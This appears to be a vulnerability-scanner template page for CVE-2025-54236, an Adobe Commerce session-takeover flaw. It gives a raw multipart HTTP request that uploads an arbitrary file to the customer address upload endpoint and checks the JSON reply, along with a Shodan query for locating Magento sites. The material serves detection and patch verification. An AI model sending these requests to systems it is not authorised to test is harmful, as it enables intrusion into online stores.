Adobe Commerce - Authentication Bypass

CVE-2025-54236

Early Release

Description

Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality, and integrity impact to high. Exploitation of this issue does not require user interaction.

Severity

Critical

Published Date

October 26, 2025

Template Author

dhiyaneshdk, slcyber, johnk3r

CVE-2025-54236.yaml

id: CVE-2025-54236

info:
  name: Adobe Commerce - Authentication Bypass
  author: DhiyaneshDK,slcyber,johnk3r
  severity: critical
  description: |
    Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality, and integrity impact to high. Exploitation of this issue does not require user interaction.
  impact: |
    Attackers can take over user sessions, compromising confidentiality and integrity of user data.
  remediation: |
    Update to the latest Adobe Commerce version.
  reference:
    - https://slcyber.io/assetnote-security-research-center/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236/?v=2
    - https://sansec.io/research/sessionreaper
  metadata:
    verified: true
    max-request: 1
    shodan-query: "X-Magento-Tags"
  tags: cve,cve2025,file-upload,intrusive,auth-bypass,kev,vkev

variables:
  form_key: "{{rand_text_alphanumeric(16)}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"
  marker: "{{randstr}}"
  base64: "{{base64(filename)}}"

http:
  - raw:
      - |
        POST /customer/address_file/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Cookie: form_key={{form_key}}

        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Content-Disposition: form-data; name="form_key"

        {{form_key}}
        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Content-Disposition: form-data; name="custom_attributes[country_id]"; filename="{{filename}}"
        Content-Type: text/plain

        {{marker}}
        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ--

        {
          "name": "{{filename}}",
          "full_path": "{{filename}}",
          "type": "text/plain",
          "tmp_name": "{{filename}}",
          "error": 0,
          "size": 11,
          "file": "/t/e/{{filename}}",
          "url": "{{RootURL}}/customer/address/viewfile/file/{{base64}}~~/"
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_any(body, "full_path","tmp_name","size","{{base64}}" )'
        condition: and
# digest: 4a0a0047304502203b0116b3e0f9f6686273970a19f4429bbf3b6041026bdcff884e7b565c5e03e3022100ebbe2fac2e525f8e44f000f4c8dd3d9ffa8da86c7e51b4d41ab4b80b2d6939ae:922c64590222798bb761d5b6d8e72950

9.5Severity

CVSS Metrics

References

https://slcyber.io/assetnote-security-research-center/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236/?v=2 https://sansec.io/research/sessionreaper

Remediation Steps

Update to the latest Adobe Commerce version.